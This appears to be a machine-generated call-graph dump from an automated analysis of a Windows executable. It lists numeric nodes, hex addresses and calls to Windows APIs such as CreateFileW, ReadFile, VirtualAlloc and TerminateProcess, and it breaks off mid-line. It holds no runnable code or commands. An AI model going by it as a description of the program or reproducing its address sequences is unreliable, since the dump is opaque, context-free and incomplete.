calls 97898->97900 97901 1264174 97899->97901 97902 1264205 97899->97902 97905 129d531 97900->97905 97918 1267c8e 97901->97918 97927 12681a7 97902->97927 97908 126417e _memset _wcscpy 97905->97908 97931 1267e0b 97905->97931 97907 129d553 97910 1267e0b 59 API calls 97907->97910 97909 12641e6 Shell_NotifyIconW 97908->97909 97909->97911 97910->97908 97911->97883 97912->97877 97914 1280f36 Mailbox 59 API calls 97913->97914 97915 1267b9b 97914->97915 97916 1268189 59 API calls 97915->97916 97917 1264137 97916->97917 97917->97894 97917->97895 97919 1267ca0 97918->97919 97920 129efc4 97918->97920 97938 1267bb1 97919->97938 97944 12b7f03 59 API calls _memmove 97920->97944 97923 1267cac 97923->97908 97924 129efce 97925 12681a7 59 API calls 97924->97925 97926 129efd6 Mailbox 97925->97926 97928 12681b2 97927->97928 97929 12681ba 97927->97929 97945 12680d7 59 API calls 2 library calls 97928->97945 97929->97908 97932 1267e1f 97931->97932 97933 129f0a3 97931->97933 97946 1267db0 97932->97946 97935 1268189 59 API calls 97933->97935 97937 129f0ae __NMSG_WRITE _memmove 97935->97937 97936 1267e2a 97936->97907 97939 1267bbf 97938->97939 97943 1267be5 _memmove 97938->97943 97940 1280f36 Mailbox 59 API calls 97939->97940 97939->97943 97941 1267c34 97940->97941 97942 1280f36 Mailbox 59 API calls 97941->97942 97942->97943 97943->97923 97944->97924 97945->97929 97947 1267dbf __NMSG_WRITE 97946->97947 97948 1268189 59 API calls 97947->97948 97949 1267dd0 _memmove 97947->97949 97950 129f060 _memmove 97948->97950 97949->97936 97951 126afae 97956 126afc2 97951->97956 97952 126b007 97954 12681a7 59 API calls 97952->97954 97962 126ac90 Mailbox _memmove 97952->97962 97953 1280f36 Mailbox 59 API calls 97953->97956 97954->97962 97955 12681a7 59 API calls 97955->97956 97956->97952 97956->97953 97956->97955 97957 1280f36 59 API calls Mailbox 97957->97962 97960 1280f36 59 API calls Mailbox 97967 126a097 Mailbox 97960->97967 97962->97957 97966 126a1b7 97962->97966 97962->97967 97969 126b685 97962->97969 97988 126b416 97962->97988 97991 12a0bc3 97962->97991 97993 12a0bd1 97962->97993 97996 126b37c 97962->97996 98001 126ade2 Mailbox 97962->98001 98010 126a000 97962->98010 98135 12dc3f4 97962->98135 98167 12c79ff 97962->98167 98173 1267f41 97962->98173 98177 12dbd80 97962->98177 98217 12b63f2 97962->98217 98226 12b71e5 59 API calls 97962->98226 98227 12dc2a7 85 API calls 2 library calls 97962->98227 97964 126b5d5 97970 12681a7 59 API calls 97964->97970 97967->97960 97967->97964 97967->97966 97971 12a03ae 97967->97971 97972 126b5da 97967->97972 97974 12681a7 59 API calls 97967->97974 97977 12677c7 59 API calls 97967->97977 97979 12b71e5 59 API calls 97967->97979 97980 1282ec0 67 API calls __cinit 97967->97980 97983 12a0d2f 97967->97983 97986 126a6ba 97967->97986 98220 126ca20 331 API calls 2 library calls 97967->98220 98221 126ba60 60 API calls Mailbox 97967->98221 98230 12c9ed4 89 API calls 4 library calls 97969->98230 97970->97966 98229 12c9ed4 89 API calls 4 library calls 97971->98229 98235 12c9ed4 89 API calls 4 library calls 97972->98235 97974->97967 97977->97967 97978 12a03bd 97979->97967 97980->97967 97982 12b63f2 Mailbox 59 API calls 97982->97966 98234 12c9ed4 89 API calls 4 library calls 97983->98234 98233 12c9ed4 89 API calls 4 library calls 97986->98233 98225 126f803 331 API calls 97988->98225 98231 1269df0 59 API calls Mailbox 97991->98231 98232 12c9ed4 89 API calls 4 library calls 97993->98232 97995 12a0bb5 97995->97966 97995->97982 98223 1269e9c 60 API calls Mailbox 97996->98223 97998 126b38d 98224 1269e9c 60 API calls Mailbox 97998->98224 98001->97969 98004 126ae4f 98001->98004 98228 12b71e5 59 API calls 98001->98228 98004->97966 98004->97969 98004->97995 98033 12d4570 98004->98033 98042 12cd107 98004->98042 98089 1272123 98004->98089 98129 12de037 98004->98129 98132 12de04b 98004->98132 98222 1269df0 59 API calls Mailbox 98004->98222 98011 126a01f 98010->98011 98028 126a04d Mailbox 98010->98028 98012 1280f36 Mailbox 59 API calls 98011->98012 98012->98028 98013 126b5d5 98014 12681a7 59 API calls 98013->98014 98019 126a1b7 98014->98019 98015 1280f36 59 API calls Mailbox 98015->98028 98018 12681a7 59 API calls 98018->98028 98019->97962 98020 1282ec0 67 API calls __cinit 98020->98028 98022 12a03ae 98238 12c9ed4 89 API calls 4 library calls 98022->98238 98024 12677c7 59 API calls 98024->98028 98026 12b71e5 59 API calls 98026->98028 98027 12a03bd 98027->97962 98028->98013 98028->98015 98028->98018 98028->98019 98028->98020 98028->98022 98028->98024 98028->98026 98029 12a0d2f 98028->98029 98031 126b5da 98028->98031 98032 126a6ba 98028->98032 98236 126ca20 331 API calls 2 library calls 98028->98236 98237 126ba60 60 API calls Mailbox 98028->98237 98240 12c9ed4 89 API calls 4 library calls 98029->98240 98241 12c9ed4 89 API calls 4 library calls 98031->98241 98239 12c9ed4 89 API calls 4 library calls 98032->98239 98242 1269997 98033->98242 98037 12d45df 98041 12d45e3 98037->98041 98285 1269bf8 98037->98285 98038 12d45ba 98038->98037 98039 126a000 331 API calls 98038->98039 98039->98037 98041->98004 98043 12cd126 98042->98043 98044 12cd131 98042->98044 98325 1269c9c 59 API calls 98043->98325 98046 12cd20b Mailbox 98044->98046 98049 12677c7 59 API calls 98044->98049 98047 1280f36 Mailbox 59 API calls 98046->98047 98085 12cd214 Mailbox 98046->98085 98048 12cd254 98047->98048 98050 12cd260 98048->98050 98382 1265906 60 API calls Mailbox 98048->98382 98051 12cd155 98049->98051 98054 1269997 84 API calls 98050->98054 98053 12677c7 59 API calls 98051->98053 98055 12cd15e 98053->98055 98056 12cd278 98054->98056 98057 1269997 84 API calls 98055->98057 98312 1265956 98056->98312 98059 12cd16a 98057->98059 98326 12646f9 98059->98326 98062 12cd2bf 98068 12cd2ea 98062->98068 98069 12cd321 98062->98069 98063 12cd28b GetLastError 98065 12cd2a4 98063->98065 98064 12cd17f 98066 1267c8e 59 API calls 98064->98066 98065->98085 98383 1265a1a CloseHandle 98065->98383 98067 12cd1b2 98066->98067 98070 12cd204 98067->98070 98377 12c3c7b 98067->98377 98072 1280f36 Mailbox 59 API calls 98068->98072 98071 1280f36 Mailbox 59 API calls 98069->98071 98381 1269c9c 59 API calls 98070->98381 98076 12cd326 98071->98076 98077 12cd2ef 98072->98077 98081 12677c7 59 API calls 98076->98081 98076->98085 98079 12cd300 98077->98079 98082 12677c7 59 API calls 98077->98082 98384 12cf656 59 API calls 2 library calls 98079->98384 98080 12cd1c6 98084 1267f41 59 API calls 98080->98084 98081->98085 98082->98079 98086 12cd1d3 98084->98086 98085->98004 98380 12c3a6e 63 API calls Mailbox 98086->98380 98088 12cd1dc Mailbox 98088->98070 98090 1269bf8 59 API calls 98089->98090 98091 127213b 98090->98091 98092 1280f36 Mailbox 59 API calls 98091->98092 98095 12a68de 98091->98095 98094 1272154 98092->98094 98097 1272164 98094->98097 98479 1265906 60 API calls Mailbox 98094->98479 98096 1272189 98095->98096 98483 12cf600 59 API calls 98095->98483 98104 1272196 98096->98104 98484 1269c9c 59 API calls 98096->98484 98099 1269997 84 API calls 98097->98099 98101 1272172 98099->98101 98103 1265956 67 API calls 98101->98103 98102 12a6926 98102->98104 98105 12a692e 98102->98105 98106 1272181 98103->98106 98108 1265e3f 2 API calls 98104->98108 98485 1269c9c 59 API calls 98105->98485 98106->98095 98106->98096 98482 1265a1a CloseHandle 98106->98482 98110 127219d 98108->98110 98111 12721b7 98110->98111 98112 12a6940 98110->98112 98113 12677c7 59 API calls 98111->98113 98114 1280f36 Mailbox 59 API calls 98112->98114 98115 12721bf 98113->98115 98116 12a6946 98114->98116 98464 12656d2 98115->98464 98118 12a695a 98116->98118 98486 12659b0 ReadFile SetFilePointerEx 98116->98486 98123 12a695e _memmove 98118->98123 98487 12c776d 59 API calls 2 library calls 98118->98487 98120 12721ce 98120->98123 98480 1269b9c 59 API calls Mailbox 98120->98480 98124 12721e2 Mailbox 98125 127221c 98124->98125 98126 1265dcf CloseHandle 98124->98126 98125->98004 98127 1272210 98126->98127 98127->98125 98481 1265a1a CloseHandle 98127->98481 98525 12dcbf1 98129->98525 98131 12de047 98131->98004 98133 12dcbf1 130 API calls 98132->98133 98134 12de05b 98133->98134 98134->98004 98136 12677c7 59 API calls 98135->98136 98137 12dc408 98136->98137 98138 12677c7 59 API calls 98137->98138 98139 12dc410 98138->98139 98140 12677c7 59 API calls 98139->98140 98141 12dc418 98140->98141 98142 1269997 84 API calls 98141->98142 98166 12dc426 98142->98166 98143 1267d2c 59 API calls 98143->98166 98144 1267a84 59 API calls 98144->98166 98145 12dc60f 98146 12dc63c Mailbox 98145->98146 98638 1269b9c 59 API calls Mailbox 98145->98638 98146->97962 98147 12dc5f6 98149 1267e0b 59 API calls 98147->98149 98151 12dc603 98149->98151 98150 12dc611 98152 1267e0b 59 API calls 98150->98152 98154 1267c8e 59 API calls 98151->98154 98155 12dc620 98152->98155 98153 12681a7 59 API calls 98153->98166 98154->98145 98157 1267c8e 59 API calls 98155->98157 98156 1267faf 59 API calls 98159 12dc4bd CharUpperBuffW 98156->98159 98157->98145 98158 1267faf 59 API calls 98161 12dc57d CharUpperBuffW 98158->98161 98636 126859a 68 API calls 98159->98636 98637 126c707 69 API calls 2 library calls 98161->98637 98163 1269997 84 API calls 98163->98166 98164 1267e0b 59 API calls 98164->98166 98165 1267c8e 59 API calls 98165->98166 98166->98143 98166->98144 98166->98145 98166->98146 98166->98147 98166->98150 98166->98153 98166->98156 98166->98158 98166->98163 98166->98164 98166->98165 98168 12c7a0b 98167->98168 98169 1280f36 Mailbox 59 API calls 98168->98169 98170 12c7a19 98169->98170 98171 12c7a27 98170->98171 98172 12677c7 59 API calls 98170->98172 98171->97962 98172->98171 98174 1267f50 __NMSG_WRITE _memmove 98173->98174 98175 1280f36 Mailbox 59 API calls 98174->98175 98176 1267f8e 98175->98176 98176->97962 98178 12dbdab 98177->98178 98179 12dbdc5 98177->98179 98639 12c9ed4 89 API calls 4 library calls 98178->98639 98640 12da328 59 API calls Mailbox 98179->98640 98182 12dbdd0 98183 126a000 330 API calls 98182->98183 98184 12dbe31 98183->98184 98185 12dbec3 98184->98185 98186 12dbe72 98184->98186 98210 12dbdbd Mailbox 98184->98210 98187 12dbf19 98185->98187 98188 12dbec9 98185->98188 98641 12c7388 59 API calls Mailbox 98186->98641 98189 1269997 84 API calls 98187->98189 98187->98210 98661 12c79c3 59 API calls 98188->98661 98190 12dbf2b 98189->98190 98194 1267faf 59 API calls 98190->98194 98192 12dbeec 98662 1265ea1 59 API calls Mailbox 98192->98662 98197 12dbf4f CharUpperBuffW 98194->98197 98196 12dbea2 98642 126f5c0 98196->98642 98200 12dbf69 98197->98200 98198 12dbef4 Mailbox 98663 126fe40 98198->98663 98201 12dbfbc 98200->98201 98202 12dbf70 98200->98202 98204 1269997 84 API calls 98201->98204 98743 12c7388 59 API calls Mailbox 98202->98743 98205 12dbfc4 98204->98205 98744 1269fbd 60 API calls 98205->98744 98208 12dbf9e 98209 126f5c0 330 API calls 98208->98209 98209->98210 98210->97962 98211 12dbfce 98211->98210 98212 1269997 84 API calls 98211->98212 98213 12dbfe9 98212->98213 98745 1265ea1 59 API calls Mailbox 98213->98745 98215 12dbff9 98216 126fe40 330 API calls 98215->98216 98216->98210 100044 12b6334 98217->100044 98219 12b6400 98219->97962 98220->97967 98221->97967 98222->98004 98223->97998 98224->97988 98225->97969 98226->97962 98227->97962 98228->98001 98229->97978 98230->97995 98231->97995 98232->97995 98233->97966 98234->97972 98235->97966 98236->98028 98237->98028 98238->98027 98239->98019 98240->98031 98241->98019 98243 12699b1 98242->98243 98244 12699ab 98242->98244 98245 129f92c __i64tow 98243->98245 98246 12699f9 98243->98246 98247 12699b7 __itow 98243->98247 98251 129f833 98243->98251 98260 12663a0 98244->98260 98298 1283818 83 API calls 3 library calls 98246->98298 98249 1280f36 Mailbox 59 API calls 98247->98249 98252 12699d1 98249->98252 98253 129f8ab Mailbox _wcscpy 98251->98253 98254 1280f36 Mailbox 59 API calls 98251->98254 98252->98244 98255 1267f41 59 API calls 98252->98255 98299 1283818 83 API calls 3 library calls 98253->98299 98256 129f878 98254->98256 98255->98244 98257 1280f36 Mailbox 59 API calls 98256->98257 98258 129f89e 98257->98258 98258->98253 98259 1267f41 59 API calls 98258->98259 98259->98253 98261 1267b76 59 API calls 98260->98261 98279 12663c5 98261->98279 98262 12665ca 98302 126766f 59 API calls 2 library calls 98262->98302 98264 12665e4 Mailbox 98264->98038 98267 129e34f 98305 12bfbdb 91 API calls 4 library calls 98267->98305 98268 1267eec 59 API calls 98268->98279 98269 126766f 59 API calls 98269->98279 98273 129e35d 98306 126766f 59 API calls 2 library calls 98273->98306 98275 129e373 98275->98264 98276 12668f9 _memmove 98307 12bfbdb 91 API calls 4 library calls 98276->98307 98277 129e2eb 98278 1268189 59 API calls 98277->98278 98280 129e2f6 98278->98280 98279->98262 98279->98267 98279->98268 98279->98269 98279->98276 98279->98277 98282 1267faf 59 API calls 98279->98282 98300 12660cc 60 API calls 98279->98300 98301 1265ea1 59 API calls Mailbox 98279->98301 98303 1265fd2 60 API calls 98279->98303 98304 1267a84 59 API calls 2 library calls 98279->98304 98284 1280f36 Mailbox 59 API calls 98280->98284 98283 126659b CharUpperBuffW 98282->98283 98283->98279 98284->98276 98286 129fb2f 98285->98286 98287 1269c08 98285->98287 98288 129fb40 98286->98288 98289 1267d2c 59 API calls 98286->98289 98292 1280f36 Mailbox 59 API calls 98287->98292 98308 1267eec 98288->98308 98289->98288 98291 129fb4a 98295 1269c34 98291->98295 98296 12677c7 59 API calls 98291->98296 98293 1269c1b 98292->98293 98293->98291 98294 1269c26 98293->98294 98294->98295 98297 1267f41 59 API calls 98294->98297 98295->98041 98296->98295 98297->98295 98298->98247 98299->98245 98300->98279 98301->98279 98302->98264 98303->98279 98304->98279 98305->98273 98306->98275 98307->98264 98309 1267f06 98308->98309 98311 1267ef9 98308->98311 98310 1280f36 Mailbox 59 API calls 98309->98310 98310->98311 98311->98291 98385 1265dcf 98312->98385 98316 1265981 98317 12659a4 98316->98317 98397 1265770 98316->98397 98317->98062 98317->98063 98319 1265993 98414 12653db SetFilePointerEx SetFilePointerEx 98319->98414 98321 126599a 98321->98317 98322 129df60 98321->98322 98415 12c349e SetFilePointerEx SetFilePointerEx WriteFile 98322->98415 98324 129df90 98324->98317 98325->98044 98327 12677c7 59 API calls 98326->98327 98328 126470f 98327->98328 98329 12677c7 59 API calls 98328->98329 98330 1264717 98329->98330 98331 12677c7 59 API calls 98330->98331 98332 126471f 98331->98332 98333 12677c7 59 API calls 98332->98333 98334 1264727 98333->98334 98335 129d82b 98334->98335 98336 126475b 98334->98336 98337 12681a7 59 API calls 98335->98337 98338 12679ab 59 API calls 98336->98338 98339 129d834 98337->98339 98340 1264769 98338->98340 98341 1267eec 59 API calls 98339->98341 98342 1267e8c 59 API calls 98340->98342 98344 126479e 98341->98344 98343 1264773 98342->98343 98343->98344 98345 12679ab 59 API calls 98343->98345 98347 12647bd 98344->98347 98362 12647de 98344->98362 98364 129d854 98344->98364 98348 1264794 98345->98348 98454 1267b52 98347->98454 98350 1267e8c 59 API calls 98348->98350 98349 129d924 98352 1267d2c 59 API calls 98349->98352 98350->98344 98372 129d8e1 98352->98372 98354 12647ef 98355 1264801 98354->98355 98357 12681a7 59 API calls 98354->98357 98356 1264811 98355->98356 98358 12681a7 59 API calls 98355->98358 98360 1264818 98356->98360 98363 12681a7 59 API calls 98356->98363 98357->98355 98358->98356 98359 129d90d 98359->98349 98367 129d8f8 98359->98367 98365 12681a7 59 API calls 98360->98365 98374 126481f Mailbox 98360->98374 98361 12679ab 59 API calls 98361->98362 98441 12679ab 98362->98441 98363->98360 98364->98349 98364->98359 98371 129d88b 98364->98371 98365->98374 98366 1267b52 59 API calls 98366->98372 98370 1267d2c 59 API calls 98367->98370 98368 129d8e9 98369 1267d2c 59 API calls 98368->98369 98369->98372 98370->98372 98371->98368 98375 129d8d4 98371->98375 98372->98362 98372->98366 98457 1267a84 59 API calls 2 library calls 98372->98457 98374->98064 98376 1267d2c 59 API calls 98375->98376 98376->98372 98459 12c449b GetFileAttributesW 98377->98459 98380->98088 98381->98046 98382->98050 98383->98085 98384->98085 98386 1265de8 98385->98386 98387 1265962 98385->98387 98386->98387 98388 1265ded CloseHandle 98386->98388 98389 1265df9 98387->98389 98388->98387 98390 1265e12 CreateFileW 98389->98390 98391 129e0b1 98389->98391 98392 1265e34 98390->98392 98391->98392 98393 129e0b7 CreateFileW 98391->98393 98392->98316 98393->98392 98394 129e0dd 98393->98394 98416 1265c4e 98394->98416 98398 129defe 98397->98398 98399 126578b 98397->98399 98409 126581a 98398->98409 98435 1265e3f 98398->98435 98400 1265c4e 2 API calls 98399->98400 98399->98409 98401 12657ad 98400->98401 98426 126538e 98401->98426 98405 12657c4 98406 1280f36 Mailbox 59 API calls 98405->98406 98407 12657cf 98406->98407 98408 126538e 59 API calls 98407->98408 98410 12657da 98408->98410 98409->98319 98429 1265d20 98410->98429 98413 1265c4e 2 API calls 98413->98409 98414->98321 98415->98324 98423 1265c68 98416->98423 98417 1265cef SetFilePointerEx 98424 1265dae SetFilePointerEx 98417->98424 98420 129e081 98425 1265dae SetFilePointerEx 98420->98425 98421 129e09b 98422 1265cc3 98422->98392 98423->98417 98423->98420 98423->98422 98424->98422 98425->98421 98427 1280f36 Mailbox 59 API calls 98426->98427 98428 12653a0 98427->98428 98428->98398 98428->98405 98430 1265d93 98429->98430 98434 1265d2e 98429->98434 98440 1265dae SetFilePointerEx 98430->98440 98432 1265807 98432->98413 98433 1265d66 ReadFile 98433->98432 98433->98434 98434->98432 98434->98433 98436 1265c4e 2 API calls 98435->98436 98437 1265e60 98436->98437 98438 1265c4e 2 API calls 98437->98438 98439 1265e74 98438->98439 98439->98409 98440->98434 98442 1267a17 98441->98442 98443 12679ba 98441->98443 98444 1267e8c 59 API calls 98442->98444 98443->98442 98445 12679c5 98443->98445 98450 12679e8 _memmove 98444->98450 98446 12679e0 98445->98446 98447 129ee62 98445->98447 98458 1268087 59 API calls Mailbox 98446->98458 98449 1268189 59 API calls 98447->98449 98451 129ee6c 98449->98451 98450->98354 98452 1280f36 Mailbox 59 API calls 98451->98452 98453 129ee8c 98452->98453 98455 1267faf 59 API calls 98454->98455 98456 12647c7 98455->98456 98456->98361 98456->98362 98457->98372 98458->98450 98460 12c3c82 98459->98460 98461 12c44b6 FindFirstFileW 98459->98461 98460->98070 98460->98080 98462 12c44cb FindClose 98461->98462 98463 12c44c7 98461->98463 98462->98460 98463->98460 98465 12656dd 98464->98465 98466 1265702 98464->98466 98465->98466 98470 12656ec 98465->98470 98467 1267eec 59 API calls 98466->98467 98471 12c32a2 98467->98471 98468 12c32d1 98468->98120 98490 1265c18 98470->98490 98471->98468 98488 12c323e ReadFile SetFilePointerEx 98471->98488 98489 1267a84 59 API calls 2 library calls 98471->98489 98478 12c33e0 Mailbox 98478->98120 98479->98097 98480->98124 98481->98125 98482->98095 98483->98095 98484->98102 98485->98110 98486->98118 98487->98123 98488->98471 98489->98471 98491 1280f36 Mailbox 59 API calls 98490->98491 98492 1265c2b 98491->98492 98493 1280f36 Mailbox 59 API calls 98492->98493 98494 1265c37 98493->98494 98495 1265632 98494->98495 98502 1265a2f 98495->98502 98497 1265d20 2 API calls 98498 1265643 98497->98498 98498->98497 98500 1265674 98498->98500 98509 1265bda 98498->98509 98500->98478 98501 126793a 61 API calls Mailbox 98500->98501 98501->98478 98503 1265a40 98502->98503 98504 129df95 98502->98504 98503->98498 98518 12b6223 59 API calls Mailbox 98504->98518 98506 129df9f 98507 1280f36 Mailbox 59 API calls 98506->98507 98508 129dfab 98507->98508 98510 1265bee 98509->98510 98511 129e047 98509->98511 98519 1265b19 98510->98519 98524 12b6223 59 API calls Mailbox 98511->98524 98514 1265bfa 98514->98498 98515 129e052 98516 1280f36 Mailbox 59 API calls 98515->98516 98517 129e067 _memmove 98516->98517 98518->98506 98520 1265b31 98519->98520 98522 1265b2a _memmove 98519->98522 98521 1280f36 Mailbox 59 API calls 98520->98521 98523 129dfd7 98520->98523 98521->98522 98522->98514 98523->98523 98524->98515 98526 1269997 84 API calls 98525->98526 98527 12dcc2e 98526->98527 98551 12dcc75 Mailbox 98527->98551 98563 12dd8b9 98527->98563 98529 12dcecd 98530 12dd042 98529->98530 98534 12dcedb 98529->98534 98613 12dd9dc 92 API calls Mailbox 98530->98613 98533 12dd051 98533->98534 98535 12dd05d 98533->98535 98576 12dca82 98534->98576 98535->98551 98536 1269997 84 API calls 98554 12dccc6 Mailbox 98536->98554 98541 12dcf14 98591 1280d88 98541->98591 98544 12dcf2e 98597 12c9ed4 89 API calls 4 library calls 98544->98597 98545 12dcf47 98598 126942e 98545->98598 98548 12dcf39 GetCurrentProcess TerminateProcess 98548->98545 98551->98131 98554->98529 98554->98536 98554->98551 98595 12cf656 59 API calls 2 library calls 98554->98595 98596 12dd0f3 61 API calls 2 library calls 98554->98596 98555 12dd0b8 98555->98551 98559 12dd0cc FreeLibrary 98555->98559 98556 12dcf7f 98610 12dd75d 107 API calls _free 98556->98610 98559->98551 98562 12dcf90 98562->98555 98611 1268ea0 59 API calls Mailbox 98562->98611 98612 1269e9c 60 API calls Mailbox 98562->98612 98614 12dd75d 107 API calls _free 98562->98614 98564 1267faf 59 API calls 98563->98564 98565 12dd8d4 CharLowerBuffW 98564->98565 98615 12bf479 98565->98615 98568 12dd930 Mailbox 98573 12dd96c Mailbox 98568->98573 98622 12dd0f3 61 API calls 2 library calls 98568->98622 98570 12677c7 59 API calls 98571 12dd90d 98570->98571 98572 12679ab 59 API calls 98571->98572 98574 12dd924 98572->98574 98573->98554 98575 1267e8c 59 API calls 98574->98575 98575->98568 98577 12dca9d 98576->98577 98581 12dcaf2 98576->98581 98578 1280f36 Mailbox 59 API calls 98577->98578 98580 12dcabf 98578->98580 98579 1280f36 Mailbox 59 API calls 98579->98580 98580->98579 98580->98581 98582 12ddb64 98581->98582 98583 12ddd8d Mailbox 98582->98583 98590 12ddb87 _strcat _wcscpy __NMSG_WRITE 98582->98590 98583->98541 98584 1269c9c 59 API calls 98584->98590 98585 1269d46 59 API calls 98585->98590 98586 1269cf8 59 API calls 98586->98590 98587 128588c 58 API calls __malloc_crt 98587->98590 98588 1269997 84 API calls 98588->98590 98590->98583 98590->98584 98590->98585 98590->98586 98590->98587 98590->98588 98625 12c592e 61 API calls 2 library calls 98590->98625 98592 1280d9d 98591->98592 98593 1280e35 VirtualAlloc 98592->98593 98594 1280e03 98592->98594 98593->98594 98594->98544 98594->98545 98595->98554 98596->98554 98597->98548 98599 1269436 98598->98599 98600 1280f36 Mailbox 59 API calls 98599->98600 98601 1269444 98600->98601 98602 1269450 98601->98602 98626 126935c 59 API calls Mailbox 98601->98626 98604 12691b0 98602->98604 98627 12692c0 98604->98627 98606 12691bf 98607 1280f36 Mailbox 59 API calls 98606->98607 98608 126925b 98606->98608 98607->98608 98608->98562 98609 1268ea0 59 API calls Mailbox 98608->98609 98609->98556 98610->98562 98611->98562 98612->98562 98613->98533 98614->98562 98616 12bf4a4 __NMSG_WRITE 98615->98616 98617 12bf4e3 98616->98617 98620 12bf4d9 98616->98620 98621 12bf58a 98616->98621 98617->98568 98617->98570 98620->98617 98623 1267a24 61 API calls 98620->98623 98621->98617 98624 1267a24 61 API calls 98621->98624 98622->98573 98623->98620 98624->98621 98625->98590 98626->98602 98628 12692c9 Mailbox 98627->98628 98629 129f4f8 98628->98629 98634 12692d3 98628->98634 98631 1280f36 Mailbox 59 API calls 98629->98631 98630 12692da 98630->98606 98632 129f504 98631->98632 98634->98630 98635 1269df0 59 API calls Mailbox 98634->98635 98635->98634 98636->98166 98637->98166 98638->98146 98639->98210 98640->98182 98641->98196 98643 126f7b0 98642->98643 98644 126f61a 98642->98644 98647 1267f41 59 API calls 98643->98647 98645 126f626 98644->98645 98646 12a4777 98644->98646 98746 126f3f0 98645->98746 98648 12dbd80 331 API calls 98646->98648 98653 126f6ec Mailbox 98647->98653 98650 12a4785 98648->98650 98654 126f790 98650->98654 98848 12c9ed4 89 API calls 4 library calls 98650->98848 98652 126f65d 98652->98650 98652->98653 98652->98654 98657 12c3c7b 3 API calls 98653->98657 98660 12d4570 331 API calls 98653->98660 98761 1264faa 98653->98761 98767 12ccc06 98653->98767 98654->98210 98656 126f743 98656->98654 98847 1269df0 59 API calls Mailbox 98656->98847 98657->98656 98660->98656 98661->98192 98662->98198 99828 12682e0 98663->99828 98665 126fe9d 98666 1270856 98665->98666 98667 12a4a86 98665->98667 99833 126f394 98665->99833 99932 12c9ed4 89 API calls 4 library calls 98666->99932 99933 12c9ed4 89 API calls 4 library calls 98667->99933 98671 12a4a9b 98672 12a4be6 98672->98671 98676 126ffac 98672->98676 99939 12da3ee 85 API calls Mailbox 98672->99939 98673 126ff9e 98673->98672 98673->98676 99937 12b6a42 59 API calls 2 library calls 98673->99937 98674 1270677 98680 1280f36 Mailbox 59 API calls 98674->98680 98675 12a4b30 98675->98671 99935 12c9ed4 89 API calls 4 library calls 98675->99935 98683 12a4c52 98676->98683 98730 12a4eac 98676->98730 99837 12684dc 98676->99837 98693 12706a5 _memmove 98680->98693 98681 12a4ba1 99938 12b6363 59 API calls 2 library calls 98681->99938 98688 12a4c70 98683->98688 99941 1268720 59 API calls Mailbox 98683->99941 98686 12a4aae 98686->98675 99934 126f803 331 API calls 98686->99934 98695 12a4c81 98688->98695 99942 1268720 59 API calls Mailbox 98688->99942 98689 1270004 98699 12a4e2f 98689->98699 98700 1270092 98689->98700 98735 12702d9 Mailbox _memmove 98689->98735 98690 12a4bc4 98696 126a000 331 API calls 98690->98696 98691 12a4c0b Mailbox 98691->98676 99940 12b6a42 59 API calls 2 library calls 98691->99940 98701 1280f36 Mailbox 59 API calls 98693->98701 98695->98735 99943 12b631f 59 API calls Mailbox 98695->99943 98696->98672 98697 1280f36 59 API calls Mailbox 98705 126ff33 98697->98705 99967 12c9b90 60 API calls 98699->99967 98703 1280f36 Mailbox 59 API calls 98700->98703 98741 1270266 _memmove 98701->98741 98708 1270099 98703->98708 98705->98671 98705->98673 98705->98674 98705->98686 98705->98693 98705->98697 98707 126a000 331 API calls 98705->98707 98715 12a4b65 98705->98715 98707->98705 98708->98666 99844 1270b30 98708->99844 98709 12a4da6 98710 126a000 331 API calls 98709->98710 98712 12a4de0 98710->98712 98712->98671 99962 1268620 98712->99962 98714 1270112 98714->98666 98714->98693 98721 1270146 98714->98721 99936 12c9ed4 89 API calls 4 library calls 98715->99936 98720 12a4e0b 99966 12c9ed4 89 API calls 4 library calls 98720->99966 98724 12681a7 59 API calls 98721->98724 98728 1270167 98721->98728 98724->98728 98726 12704f8 98726->98210 98727 1280f36 59 API calls Mailbox 98727->98735 98728->98666 98729 12a4e7d 98728->98729 98733 12701ac 98728->98733 99968 1269e9c 60 API calls Mailbox 98729->99968 98730->98671 99969 12c9ed4 89 API calls 4 library calls 98730->99969 98732 1270238 99921 1269e9c 60 API calls Mailbox 98732->99921 98733->98666 98733->98730 98733->98732 98735->98666 98735->98709 98735->98720 98735->98726 98735->98727 98736 12a4d75 98735->98736 99923 12688a0 98735->99923 99930 12687c0 68 API calls 98735->99930 99944 12c59de 68 API calls 98735->99944 99945 1268b13 98735->99945 99961 1269e9c 60 API calls Mailbox 98735->99961 98739 1280f36 Mailbox 59 API calls 98736->98739 98737 127024b 98737->98666 99922 126843f 59 API calls Mailbox 98737->99922 98739->98709 98741->98735 98742 12702c2 98741->98742 99931 1269df0 59 API calls Mailbox 98741->99931 98742->98210 98743->98208 98744->98211 98745->98215 98747 126f59a 98746->98747 98749 126f41c 98746->98749 98850 12c9ed4 89 API calls 4 library calls 98747->98850 98749->98747 98757 126f459 _memmove 98749->98757 98750 126f533 98751 126f543 98750->98751 98849 12da3ee 85 API calls Mailbox 98750->98849 98751->98652 98753 1280f36 59 API calls Mailbox 98753->98757 98754 12a4752 98852 126f803 331 API calls 98754->98852 98755 126a000 331 API calls 98755->98757 98757->98750 98757->98753 98757->98754 98757->98755 98758 12a4702 98757->98758 98759 12a4704 98757->98759 98758->98652 98851 12c9ed4 89 API calls 4 library calls 98759->98851 98762 1264fb4 98761->98762 98763 1264fbb 98761->98763 98853 1285516 98762->98853 98765 1264fca 98763->98765 98766 1264fdb FreeLibrary 98763->98766 98765->98656 98766->98765 98768 12677c7 59 API calls 98767->98768 98769 12ccc3b 98768->98769 98770 12677c7 59 API calls 98769->98770 98771 12ccc44 98770->98771 98772 12ccc58 98771->98772 99260 1269c9c 59 API calls 98771->99260 98774 1269997 84 API calls 98772->98774 98775 12ccc75 98774->98775 98776 12ccd76 98775->98776 98777 12ccc97 98775->98777 98782 12ccda6 Mailbox 98775->98782 99127 1264f3d 98776->99127 98778 1269997 84 API calls 98777->98778 98780 12ccca3 98778->98780 98783 12681a7 59 API calls 98780->98783 98782->98656 98786 12cccaf 98783->98786 98784 12ccda2 98784->98782 98785 12677c7 59 API calls 98784->98785 98788 12ccdd7 98785->98788 98791 12cccf5 98786->98791 98792 12cccc3 98786->98792 98787 1264f3d 136 API calls 98787->98784 98789 12677c7 59 API calls 98788->98789 98790 12ccde0 98789->98790 98794 12677c7 59 API calls 98790->98794 98793 1269997 84 API calls 98791->98793 98795 12681a7 59 API calls 98792->98795 98796 12ccd02 98793->98796 98797 12ccde9 98794->98797 98798 12cccd3 98795->98798 98799 12681a7 59 API calls 98796->98799 98801 1267e0b 59 API calls 98798->98801 98803 12ccd0e 98799->98803 98802 12cccdd 98801->98802 98805 1269997 84 API calls 98802->98805 99261 